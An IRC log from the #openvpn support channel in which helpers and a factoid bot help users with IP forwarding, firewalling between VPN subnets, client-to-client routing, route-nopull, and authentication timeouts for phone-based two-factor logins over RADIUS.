16:29 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward
16:29 < eugenmayer> (its linux, debian)
16:30 <@krzee> !learn ipforward as ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc
16:30 <@vpnHelper> Joo got it.
16:30 <@krzee> !forget ipforward 2
16:30 <@vpnHelper> Joo got it.
16:30 < eugenmayer> ok, so i did those routes, restarted both servers and the client, but still i cant ping 10.77.0.102
16:30 <@krzee> !learn ipforward as ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
16:30 <@vpnHelper> Joo got it.
16:30 < eugenmayer> its working!
16:31 <@krzee> that was a magical 2 seconds
16:31 < eugenmayer> chef turned on the fw on the .102 in the meantime..
16:31 <@krzee> from not working to working :D
16:31 < eugenmayer> yeah, ping did fail since the fw on the .102 was on again
16:31 <@krzee> gotchya =]
16:32 <@krzee> i was about to say to ping from .102 to .1 on the other subnet, to test .102's firewall :D
16:32 < eugenmayer> krzee++
16:32 <@krzee> but you beat me to the logical testing =]
16:32 < eugenmayer> You are my personal hero.
16:32 <@krzee> thanks, we actually keep track of karma here now
16:32 <@krzee> !karma
16:32 <@vpnHelper> "karma" is nick++ adds karma nick-- adds bad karma, as seen in !ircstats
16:32 <@krzee> :D
16:32 < eugenmayer> !karma krzee
16:33 <@krzee> nah you did it already
16:33 <@krzee> !ircstats
16:33 <@vpnHelper> "ircstats" is (#1) See http://secure-computing.net/logs/openvpn.html for all-time IRC stats. or (#2) See http://secure-computing.net/logs/openvpn-devel.html for all-time dev channel IRC stats.
16:33 <@krzee> thats where ya see it
16:33 < eugenmayer> i wonderful :)
16:33 < eugenmayer> looks like you are rather the hero of this channel..
16:33 < eugenmayer> well now i have to switch the VPN server firewall on and see what happens
16:34 <@krzee> it looks like EugeneKay would disagree
16:34 < eugenmayer> but i guess thats simple FW log debugging then
16:34 <+EugeneKay> Mrh
16:34 < eugenmayer> EugeneKay doesnt count, he is like the openvpn-server. He cant be taken into account
16:34 < eugenmayer> Its unfair competition
16:35 < eugenmayer> (hope nobody gets that wrong, that was just a joke..i was banned in #java recently for making a similar joke..before i could explain..)
16:36 <@krzee> im sure you're fine, as long as you dont talk bad about EugeneKay's furballs ;]
16:36 <+EugeneKay> Oh, didn't know pisg does karma
16:36 <+EugeneKay> Is that new in 0.73?
16:37 < eugenmayer> Feb 2 23:36:29 vpn kernel: [1426805.431803] Shorewall:FORWARD:REJECT:IN=tun12 OUT=tun2 SRC=10.77.1.2 DST=10.77.0.102 LEN=64 TOS=0x00 PREC=0x00 TTL=63 ID=30073 DF PROTO=TCP SPT=61915 DPT=2201 WINDOW=65535 RES=0x00 SYN URGP=0
16:37 < eugenmayer> hehe, FW on :) but well thats an easy task
16:37 < eugenmayer> after you helped me with the harder nuts
16:44 <@krzee> yep, everything left should be firewall
16:48 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 252 seconds]
16:50 -!- raidz_away [~raidz@raidz.im] has joined #openvpn
16:50 -!- raidz_away is now known as raidz
16:50 -!- raidz [~raidz@raidz.im] has quit [Changing host]
16:50 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
16:50 -!- mode/#openvpn [+o raidz] by ChanServ
16:53 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer]
16:55 < eugenmayer> krzee: just for my docs, push "route 10.77.0.0 255.255.255.0"
16:55 < eugenmayer> i thought that pushes a route to the client, but thats wrong, right? Thats for the server
16:58 <@krzee> !push
16:58 <@vpnHelper> "push" is usage: push , goes in the server config and makes the command act as if it was in the client config, can be used in ccd entries
16:58 < eugenmayer> well, that means actually iam right? so those routes are for the client?
16:59 < eugenmayer> (well kind of makes no sense to me, since the client is 10.77.1.0 ..and we also added it to 10.77.0.0
17:00 < kisom> eugenmayer: If you push a route and the client has the pull directive, then the route will be added at the client side.
17:01 < eugenmayer> hm
17:19 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has quit [Quit: Leaving.]
17:26 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
17:36 -!- kunago [~Thunderbi@ip4-83-240-40-78.cust.nbox.cz] has joined #openvpn
17:38 < kunago> Hi.
Could anyone please give me a hint on how I could possibly limit certain connected clients on my VPN subnetwork? I am connecting 5 different networks via OpenVPN and would like to limit the access of some IP-based clients to the other parts of my VPN network, such as remote subnets.
17:39 < kunago> I am using iptables on my VPN server which I am trying to use.
17:40 < kunago> I read all different possibilities found but nothing really worked.
17:40 <@krzee> im not 100% of what you mean, do you mean you want certain clients to not access certain subnets? or do you mean you dont want them connecting to certain servers?
17:41 <@krzee> both are doable, i just need to know which is the goal ;]
17:41 <@krzee> oh, or is there only 1 server and 4 networks behind clients?
17:42 < kunago> I don't want clients with certain IP addresses to access certain subnets. Lets say my range for one location is 192.168.1.x/24 and 192.168.2.x/24 for another one. And I have some chosen range of clients on the first subnets that I would like to deny the access to the other subnet.
17:42 < kunago> Yes.
17:43 < kunago> One server connecting 5 networks having like 20 clients each.
17:43 < kunago> I hope it makes sense.
17:45 < kunago> I am pushing all the subnets to each of the subnets. Basically as it is, each connected client sees/can see all clients on all subnets.
17:48 < kunago> I know I can limit access of subnets to other subnets via the "ccd" directory which I am doing with success. Now I am trying to limit certain clients on subnets to be able to access other subnets.
17:55 -!- mattock_afk is now known as mattock
18:04 <@krzee> kunago, you must use firewall
18:04 <@krzee> you can limit the added routes, but it means nothing
18:04 <@krzee> because anyone can add a route anyways
18:04 -!- mattock is now known as mattock_afk
18:05 <@krzee> also test what happens when you manually change their IP to another subnet
18:05 <@krzee> you may end up wanting to use topology net30 instead of topology subnet
18:06 <@krzee> (net30 is the default)
18:07 -!- Porkepix [~Porkepix@79.31.185.239] has quit [Quit: Computer has gone to sleep.]
18:07 -!- exed [~maximus@host-188-174-219-251.customer.m-online.net] has joined #openvpn
18:09 < kunago> Well, I may not have explained how the network looks like. So let me re-explain:
18:09 < kunago> - server
18:09 < kunago> -- connecting client (usually router or any other box establishing connection with server, representant of a subnet)
18:09 < kunago> --- client PC connected to router (having automatically access to all subnets through router connected to the server)
18:14 -!- mattock_afk is now known as mattock
18:17 <@krzee> thats what i expected
18:17 <@krzee> !route
18:17 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
18:17 <@krzee> like that, but with 2 more networks ;]
18:22 < kunago> Doing this, I mean I am routing etc. I know I can limit seeing LANs via CCD but I am trying to limit client PCs connected to clients of VPN server (so basically the layer 3 of the above description). The above does refer to whole LANs as I understand it, not to connected clients for which I assume I need to use iptables in order to limit the access. Or am I wrong?
18:22 <@krzee> kunago, you must use firewall
18:22 <@krzee> you are not wrong, you must use the firewall on your server
18:24 <@krzee> if you were to limit "seeing lans" by limiting routes added, it will not matter
18:24 <@krzee> if im a client, and you only give me the routes you want me to have, what stops me from adding the routes you DONT want me to have
18:24 <@krzee> you must firewall me off if you dont want me accessing stuff, but have things like ip forwarding and return routes setup for the other clients that *should* have access
18:25 < kunago> Good. I am using iptables on the server. The only thing is me not being able to set it up since no settings really work. I was just trying to get help here little someone knew. I was using the FILTER table and was trying to filter by IP address (source or destination) etc. Nothing was preventing clients from pinging the forbidden network.
18:25 <@krzee> the forward chain =]
18:26 <@krzee> and do not use client-to-client in your server
18:26 < kunago> Yeah, tried as well with no luck.
18:26 <@krzee> !c2c
18:26 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things behind
18:26 <@vpnHelper> other clients
18:26 < kunago> OK, that might be it, the C2C setting.
18:26 <@krzee> oh you had it enabled?
18:26 <@krzee> ya that bypasses your kernel all together, no firewall rules apply
18:26 <@krzee> keeps it all inside openvpn
18:28 < kunago> Oh, alright, my bad then. That pretty much explains it then.
18:28 <@krzee> that fixed it?
18:29 <@krzee> and if you really wanna get all ninja
18:29 -!- exed [~maximus@host-188-174-219-251.customer.m-online.net] has quit [Quit: exed]
18:29 <@krzee> you could use a --learn-address script to apply firewall rules, and even have them apply if the client changes his address!
18:30 < kunago> I will need to verify this and write some firewall rules to test but looking at the description that must be the solution - to turn it off and write rules.
18:30 <@krzee> which could read from a db or anything you say!
18:30 < kunago> I am using static addresses for all known clients. The unknown clients should have the red light for anything.
18:30 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
18:30 <@krzee> yep, its certainly at least 1 solution, after you test we'll see if theres more issues or not =]
18:31 <@krzee> but if all else was good, then thats it!
18:31 <@krzee> oh i see
18:31 <@krzee> you may like this too if you decide to also limit routes in ccd entries
18:32 <@krzee> ccd/DEFAULT is read when ccd/common-name doesnt exist
18:32 -!- nickanderson_afk is now known as nickanderson
18:35 < kunago> Anyways, thank you a lot for your help. I will see whether the C2C line solves the issue (it takes a while to restart everything and do something useful as I am not a pro), however, I am really glad you were willing to help me with this. Back 2 years when I started with OpenVPN and no clue at all, you were here to help. Back then it was just 2 LANs (quite simple back then) and a few clients. Now it's grown into something wilder and working
18:36 -!- nickanderson is now known as nickanderson_afk
18:36 -!- mattock is now known as mattock_afk
18:36 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn
18:36 < NuclearMeltdown> How do you prevent openVPN from changing the default route?
18:37 < NuclearMeltdown> I have this 128.0.0.0 netmask 128.0.0.0 and 0.0.0.0 same nm going to VPN router
18:37 < NuclearMeltdown> why it's /31 I have no idea to begin with
18:37 <@krzee> easiest way, by not pushing the route to the client
18:38 <@krzee> but since you ask, i assume you dont run the server, right?
18:38 < NuclearMeltdown> right
18:38 <@krzee> kunago, cool! glad it helped before and hope it helps again =]
18:38 < NuclearMeltdown> I removed it by hand, and today it put it back by itself
18:38 <@krzee> i thought your nick was familiar kunago
18:39 <@krzee> !factoids search route
18:39 <@vpnHelper> 'winroute', 'iroute', 'router', 'dlink_static_route', 'external_routes', 'route_override', 'splitroute', 'route_outside_openvpn', 'route_outside_ovpn', 'routebyapp', and 'route'
18:39 <@krzee> hmm
18:39 <@krzee> !route_override
18:39 <@vpnHelper> "route_override" is (#1) https://forums.openvpn.net/viewtopic.php?f=15&t=7161 for how to override --redirect-gateway for a certain subnet or (#2) to see how to make it so the client will still reply to requests to its public ip over the internet and not the vpn see !splitroute
18:39 <@krzee> you could do that with 4 route entries
18:40 <@krzee> just like def1 uses 2 entries to override default gateway
18:40 <@krzee> !def1
18:40 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway.
or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 18:40 <@krzee> or you could use route-nopull and manually add the needed routes for your vpn to work 18:40 <@krzee> and i think theres even a script hook that could add the routes you need and your script could ignore the default routes 18:40 <@krzee> !script 18:40 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 18:41 <@krzee> so theres a couple ways, use what feels warm and fuzzy to you 18:42 < NuclearMeltdown> route-nopull 18:42 < NuclearMeltdown> maybe that thanks 18:43 < NuclearMeltdown> also, incoming connections to my actual IP get send back through the VPN. I'm not sure what happens. Does the return IPv4 address get set to the VPN and then the connection host doesn't recognize the IP and drops the packet? Or does it keep the proper return address (the same used to connect with) and then 18:43 < NuclearMeltdown> send it to the VPN but then it gets dropped since the sending address is outside the allowed range on the VPN firewall 18:49 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:51 <@krzee> its because of redirect-gateway 18:52 <@krzee> if you wanted to keep redirect-gateway and still serve to the internet from internet-ip, 18:52 <@krzee> !splitroute 18:52 <@vpnHelper> "splitroute" is (#1) https://forums.openvpn.net/topic7175.html to see how to add a second routing table so you can use --redirect-gateway AND still serve things to the internet or (#2) see !route_override for how to override --redirect-gateway for a certain subnet 18:54 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 18:56 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 18:57 -!- mndo [~mndo@188.80.208.101] has joined #openvpn 19:09 -!- kunago [~Thunderbi@ip4-83-240-40-78.cust.nbox.cz] has 
quit [Remote host closed the connection] 19:14 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Read error: Connection reset by peer] 19:15 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 19:18 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 19:29 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 19:30 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 19:42 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 19:44 -!- WinstonSmith [~WinstonSm@84.131.49.60] has joined #openvpn 19:44 -!- WinstonSmith [~WinstonSm@84.131.49.60] has quit [Changing host] 19:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 19:47 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 19:48 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 276 seconds] 20:10 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 20:10 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 20:13 -!- mndo [~mndo@188.80.208.101] has quit [Quit: going home] 20:41 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 20:46 < NuclearMeltdown> Why does it use /31 as the netmask for the two default routes? 
20:46 <+pekster> Windows compatibility
20:46 < Maverick0984> krzee: PhoneFactor is a program that essentially is a Radius server that also calls your phone and provides 2 factor authentication
20:46 <+pekster> You can use whatever you want in p2p topology NuclearMeltdown
20:46 < NuclearMeltdown> doh
20:47 < Maverick0984> problem is, every openvpn client i have found times out the auth process before the phone call can be completed
20:47 <+pekster> eg: 'ifconfig 192.168.1.2 172.16.10.11' is completely valid in PtP on non-Windows. Very silly, but allowed.
20:47 < NuclearMeltdown> to have the default gateway outside of the network range?
20:47 <+pekster> Maverick0984: You can increase your timeout time. But really, use a better 2-factor method like the google authenticator
20:48 <+pekster> (Unless you really can't use a more modern digital version with --user-pass, like RSA ID or Google Auth)
20:48 < Maverick0984> not really my choice which authenticator to use, it's a microsoft product now, it isn't a junk system
20:49 < Maverick0984> in any case, how do i increase the timeout time?
20:49 <+pekster> You can write scripts to use whatever you want on the backend, independent of the radius :\
20:49 < Maverick0984> that is what i have been unable to find
20:49 <+pekster> For what, the TLS?
20:49 < Maverick0984> i think it is client side that is the issue
20:49 <+pekster> --tls-timeout or --connect-timeout is probably what you want
20:49 -!- brute11k [~brute11k@89.249.230.122] has joined #openvpn
20:49 <+pekster> Oh, the connect is just tcp, so nvm
20:50 <+pekster> Hmm, there's another timeout option I believe I'm not seeing. IIRC it's something like 60 seconds by default, but I need to find it first :)
20:51 < Maverick0984> the vpn has to be stupid easy, we aren't purchasing an RSA ID system, and a lot of people would be confused by Google Auth
20:51 <+pekster> A system they click the app and type the numbers?
20:51 <+pekster> Okay...
20:51 < Maverick0984> not tech savvy people
20:51 -!- [fred] [fred@konfuzi.us] has joined #openvpn
20:51 < Maverick0984> and not all of the users even have smartphones
20:51 < Maverick0984> so it won't work
20:52 < Maverick0984> after inputting user/pass, i just need it to wait at least 10-15 secs, instead of the 2-3 it actually does wait
20:52 <+pekster> Oh, it's that short? Maybe it is --tls-timeout then
20:52 < Maverick0984> it's very short, yeah
20:52 <+pekster> See that option and it may solve your issue
20:52 < Maverick0984> the call makes it and during the answer it times out
20:52 <+pekster> (default=2 in my 2.3.0 manpage)
20:53 <+pekster> Set that to 30 or something and you should have better results
20:53 <+pekster> The downside is that actual loss of the TLS session will take that long to detect
20:53 <+pekster> But, I presume you want the trade-off
20:53 <+pekster> I dunno, rather than a call, I'd just use x509 certs + user/pass if you wanted 2-factor. But maybe it's an org requirement or such to use your fancy calling system
20:55 <@krzee> Maverick0984, you can do it, it would be a radius script
20:55 <@krzee> radius auth is nothing new in combination with openvpn
20:56 <@krzee> sorry if that was already said, i didnt read all scroll yet
20:56 < Maverick0984> i didn't think it was, it was the phone part that is the issue, disabling the phone auth, and it works great
20:57 <@krzee> "it's a microsoft product now, it isn't a junk system" we must have different definitions of "junk" :D
20:57 < Maverick0984> heh
20:59 <+pekster> Call-to-verify systems have fallen out of popularity for a reason
20:59 <+pekster> ;)
20:59 <@krzee> [18:46] Why does it use /31 as the netmask for the two default routes?
20:59 <@krzee> NuclearMeltdown, it doesnt, it uses /1
20:59 <@krzee> and it does that to override the default route (/0) without deleting it
20:59 < Maverick0984> pekster: unfortunately that doesn't help me :-/ do you have a link to that manpage?
20:59 <+pekster> Oh, I read that too fast (I assumed he meant the /31 in a unix PtP, :x
20:59 <@krzee> but /31 doesnt even exist =]
21:00 <+pekster> There's an RFC for using /31's in PtP setups
21:00 <@krzee> oh allllrighty then :D
21:00 <+pekster> Of course, in ipv6 you just use an entire /64 if you want it ;)
21:01 <@krzee> last time i doused your ipv6 in holy water you came back with an upgraded cloak (funny coincidence in timing)
21:01 <+pekster> That, and I'm on freenode via ipv6 now ;)
21:01 <+pekster> Someday you'll join us
21:02 <@krzee> yep, its bound to happen eventually
21:02 <+pekster> Land of lots of IPs, and sometimes bad ISPs that try to give you anything less than a /56
21:02 < Maverick0984> krzee: so you are saying the work needs to be done on the radius server then? not the client?
21:02 <@krzee> Maverick0984, nope, i say you simply need a script to handle it all
21:02 <@krzee> on the server
21:02 <@krzee> and a script on the client to collect the info from client
21:02 <@krzee> !authpass
21:02 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name
21:03 <@krzee> one of those, but for radius
21:03 <+pekster> The deal is his radius has a callout backend, so the timeout needs to go up to support the insane delay that'll cause
21:03 <+pekster> ie: --client-connect is going to effectively block until that's done
21:04 < Maverick0984> yeah, i don't need more info inputted on the client side
21:04 <@krzee> oh well that could be a big problem
21:04 <@krzee> if your authpass wont happen quick enough, you'll be fubar
21:04 <+pekster> Not with --tls-timeout (I think client-side only is fine, although you may need that both sides)
21:04 <@krzee> whats it calling out to?
21:04 <+pekster> a phone. A literal call ;)
21:04 < Maverick0984> just a cell phone or any phone
21:04 <@krzee> omg
21:04 <@krzee> heh have fun
21:04 * pekster already suggested it wasn't a great solution, but apparently it's "required"
21:04 < Maverick0984> then the user hits # and the auth completes
21:04 <@krzee> http://permalink.gmane.org/gmane.network.openvpn.user/11626
21:05 <@vpnHelper> Title: RADIUS-Plugin for authentication and accounting (at permalink.gmane.org)
21:05 <@krzee> thats the radius stuff
21:05 <@krzee> even when you get it working, you'll have the problems pekster mentioned
21:05 < Maverick0984> the "radius stuff" works fine
21:05 <@krzee> and your non-technical users will hate you
21:05 < Maverick0984> i've had that working
21:05 <@krzee> yes the radius stuff will work
21:05 <@krzee> but openvpn will timeout
21:05 < Maverick0984> and the phone call stuff worked fine with PPTP
21:05 <@krzee> before most responses most likely
21:05 <@krzee> !pptp
21:05 < Maverick0984> but i don't want to have to use PPTP
21:05 <@vpnHelper> "pptp" is (#1) PPTP is known to be a faulty protocol. The designers of the protocol, Microsoft, recommend not to use it due to the inherent risks. Lots of people use PPTP anyway due to ease of use, but that doesn't mean it is any less hazardous. The maintainers of PPTP Client and Poptop recommend using OpenVPN (SSL based) or IPSec instead. http://pptpclient.sourceforge.net/protocol-security.phtml to
21:05 <@vpnHelper> read about why to not use pptp or (#2) Why not to use it: http://en.wikipedia.org/wiki/Pptp#Security or (#3) https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/
21:05 <@krzee> apple vs orange, no point in mentioning
21:05 <+pekster> Just increase the --tls-timeouts to handle the server blockage
21:06 < Maverick0984> just saying that's where it came from...
21:06 <@krzee> pekster, if he uses a plugin it wont block
21:06 <@krzee> like the scripts dop
21:06 <@krzee> do*
21:06 <@krzee> plugins get their own thread
21:06 <+pekster> Ah, okay
21:07 <@krzee> maybe high enough timeouts will fix it
21:07 <@krzee> may as well check i guess!
21:07 <@krzee> Maverick0984, you got my link to radius plugin, right?
21:08 < Maverick0984> yeah, i'm looking at it, but i have radius auth working, what does this get me?
21:08 <@krzee> you have radius auth working on openvpn already?
21:08 < Maverick0984> yeah
21:08 < Maverick0984> works great
21:08 <@krzee> maybe im misunderstanding something then
21:08 <@krzee> whats not working?
21:08 < Maverick0984> 21:05:13 < Maverick0984> the "radius stuff" works fine
21:08 < Maverick0984> heh
21:08 <@krzee> what stuff doesnt?
21:09 < Maverick0984> if i disable the phone call, everything is peachy
21:09 < Maverick0984> it's the phone call being used for 2 factor that is the problem
21:09 < Maverick0984> the client times out the authentication process
21:09 < Maverick0984> and asks for credentials again during the call
21:09 <@krzee> does the phonecall ever happen?
21:09 < Maverick0984> essentially looping
21:09 <@krzee> ahh ok
21:09 < Maverick0984> yeah, it happens
21:09 <@krzee> ahh ya thats what pekster was saying would happen
21:10 <@krzee> try increasing the timeouts like he said
21:10 < Maverick0984> just a line in the config files?
21:10 <@krzee> but really, it might just be a shitty way to do 2-factor auth on things that are time sensitive
21:11 <@krzee> also, is there a reason you feel phones are somehow secure?
21:11 <+pekster> There's a reason most rotating-numeric schemes (RSA ID, google auth, etc) all use at *least* a 30-second timeout; that's the smallest a user can usually handle
21:11 <@krzee> cause personally i cant think of a less secure device in my arsenal
21:11 < Maverick0984> sigh, this wasn't my decision to use
21:11 < Maverick0984> it's more secure than user/pass
21:12 < Maverick0984> hence, 2 factor
21:12 <+pekster> Not when you combine x509 too
21:12 <+pekster> x509 (something the user has) + user/pass (something the user knows) is the textbook definition of a secure 2-factor scheme
21:12 < Maverick0984> what? it's a second level, even if the second level isn't secure, 2 levels is still more secure than 1 level
21:12 <+pekster> Yes, yes, I'm very well aware of 2-factor auth
21:12 <@krzee> !goodsecurity
21:12 <@krzee> hrm
21:12 <@krzee> !factoids
21:12 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
21:12 <+pekster> You're not combining the 3rd traditional factor, biometric, so what's the point of using the phone?
21:12 * pekster doesn't get it
21:13 <+pekster> Or can you not distribute certs to your users?
21:13 <+pekster> (if you control the client hardware, you surely can)
21:13 <@krzee> !howsecurityworks
21:13 <@vpnHelper> "howsecurityworks" is security can be obtained by: something you have (certificates, usb tokens), something you know (passwords), something you are (biometrics). for best security use more than 1. if you save passwords to a file (!pwfile), you change them from something you know to something you have, which destroys the point of using passwords
21:13 <@krzee> a cert and a phone are both "SOMETHING YOU HAVE"
21:13 <@krzee> so not true 2-factor
21:13 < Maverick0984> still have to input user/pass
21:14 < Maverick0984> which generates the phone call
21:14 <@krzee> then you have 2-factor
21:14 <@krzee> without the phone
21:14 < Maverick0984> it is still something you know and something you have
21:14 <+pekster> Oh, you're using the phone instead of x509 certs?
21:14 <+pekster> Ish
21:14 < Maverick0984> there is a cert involved as well
21:14 < Maverick0984> whatever pfsense generated
21:14 <+pekster> Client certs?
21:14 < Maverick0984> not unique
21:14 <@krzee> the phone adds nothing except time
21:14 <@krzee> not unique!?
21:14 <@krzee> so you replaced proper PKI with phones
21:15 <@krzee> srs?
21:15 <+pekster> Public Kalling Infrastructure ;)
21:15 <@krzee> haha
21:15 < Maverick0984> it is still encrypted and is still user/pass required
21:15 <+pekster> I mean, it works, but it's a really nasty, convoluted solution requiring the user to accept a phone call. What do they do if the cell has a dead battery, or has no service?
21:15 < Maverick0984> sigh, again, this wasn't my choice, i'm merely trying to make it work
21:16 < Maverick0984> criticizing "my" design isn't helping
21:16 <+pekster> Meh. Try the openvpn radius plugin (may resolve blocking) or add a timeout
21:16 < Maverick0984> i can't use any kind of plugin like that, the server is running on pfsense
21:16 <@krzee> im not much into stacking piles of crap on top of eachother, adding paint, and trying to call it complete
21:16 <+pekster> You already have our suggestions. Unless you need more help understanding them, you're not likely to get a pat-on-the-back for what you're trying to do. I get it isn't your choice, but I still think it's stupid (and pity won't change that)
21:16 < Maverick0984> it's not a normal install
21:16 <@krzee> i support pekster's last statement ^
21:17 <@krzee> and yes, changing timeouts is a line in the server config
21:18 < Maverick0984> it's still something you have + something you know, following the very thing you linked, at this point, you guys are just being arrogant. not all of the users have smart phones so google auth or anything like it isn't an option. additionally, it is a start up where money isn't bountiful, so purchasing RSA ID hardware isn't an option either.
21:18 <@krzee> im glad ive never had to work for people that force me to implement fail… so far everyone who has ever paid me to do work has done so because they feel that i am mentally well equipped to implement win without them forcing fail upon me
21:18 <+pekster> Side note: your employer must not like things to work, since they don't let you do multi-factor in the most efficient way *and* also prevent you from using an OS where you can make the plugin work? Fun. Last I checked, pfsense could let you build the software yourself, unless you're also "prohibited" from doing it
21:19 <+pekster> krzee: Ugh, same comment, basically :P
21:20 < Maverick0984> i just got done explaining how both of your proposed other methods are not applicable, if you aren't even going to read what i type, why am i even here...sigh, forget it
21:20 < Maverick0984> thanks i guess
21:20 -!- Maverick0984 [maverick@poundcs.org] has left #openvpn []
21:20 <+pekster> Lovely
21:20 <@krzee> people are funny
21:21 <+pekster> "because I'm not allowed" is not a technical reason. It's a social one. And yes, he has a social problem with his employer, and maybe he can hack a solution together. Hopefully he (or she) is paid very well, because that sounds really stressful
21:21 <@krzee> i HIGHLY doubt hes forced to that level of fail
21:21 <+pekster> Some shops are so "MS-centric" that even when implementing non-MS solutions, they force you to use as much of the MS-crap as they can. I just don't work for such people :)
21:22 <@krzee> that part i believe is forced
21:22 <@krzee> but using improper PKI and phones, that part i doubt is forced
21:22 <+pekster> I've done Openvpn+Linux/Unix+Radius+2-factor before, and it works great. Even securely too, if you can talk an AD admin into getting you the required LDAPS certs for the domain (that's actually a PITA, since you MUST install "Certificate Services" on a bloody domain controller. Thanks Redmond)
21:23 <+pekster> No, it's not enough to install cert services on a mere domain member server ;)
21:23 < NuclearMeltdown> krzee, oh clever
21:23 <@krzee> NuclearMeltdown, ya its pretty cool!
21:23 <+pekster> I laughed when I saw that KB article, and we just used our semi-secure unroutable management VLVAN for the traffic. If they can hack that VLAN, they deserve to MITM the RADIUS auth was the idea
21:24 <@krzee> so if you wanted, you could use 4 routes to override those 2, using the exact same idea
21:24 <+pekster> VLAN*
21:24 <@krzee> !cidr
21:24 <@vpnHelper> "cidr" is http://www.oav.net/mirrors/cidr.html
21:24 <@krzee> that would be a handy link if doing so
21:24 <+pekster> krzee: But, with IPv6 we can recurse even more!
21:24 <@krzee> muahaha
21:24 <+pekster> Haven't you always wanted to stack 64 VPNs on top of each other?
21:25 <@krzee> lets make a 64 vpn deep vpnchain
21:25 <@krzee> with inner vpns and everything
21:26 <@krzee> pekster, did i ever point you to my writeup on vpnchains where i gave my findings when doing a vpn in a vpnchain?
21:26 <+pekster> My 2-factor for your most-inner tunnel is going to be Morse-Code-Exchange of a PSK with someone on the south pole research station. If you can't get a contact, you can't connect. Because security.
21:26 <@krzee> hahahaha
21:26 <@krzee> i luled
21:27 <+EugeneKay> vpnception
21:27 <@krzee> nice!
21:27 <@krzee> https://www.secure-computing.net/wiki/index.php/OpenVPN/VpnChains
21:27 <@vpnHelper> Title: OpenVPN/VpnChains - Secure Computing Wiki (at www.secure-computing.net)
21:27 <@krzee> after turning client-b into another server, and connecting the laptop to that over the first vpnchain, i got BETTER throughput over that than the vpnchain
21:28 <@krzee> only slightly, but quite surprisingly
21:29 <+pekster> Basically a 'poor-mans-onion' network
21:30 <+pekster> I did something silly like that with IETF 'special use network' ranges using PtP connections. It was very silly
21:30 <+pekster> I think you saw the pastebin of that :P
21:31 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer]
21:31 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
21:33 <+pekster> krzee, I wonder if the slight increase in perf throughput was the result of the measurement (ie: iperf) traffic using tcp, and something weird about the window or scaling. You might have had different results with 'iperf -u'
21:33 <+pekster> It's almost negligible, but tuning tcp opts often has very subtle changes like that
21:34 <@krzee> could be, too bad i didnt know ya 2.5 yrs ago ;]
21:34 <@krzee> cause i totally dont care to do it again
21:34 <+pekster> Right
21:34 <@krzee> well at least not now
21:34 <+pekster> It's a very silly thing to test unless you don't know what to do with your free time
21:35 <@krzee> im sure ill get another reason to setup some more vpnchains at some point
21:35 <+pekster> Go get IPv6 set up at your network before you do this again
21:35 <@krzee> that sort of setup is why i learned enough to write !route
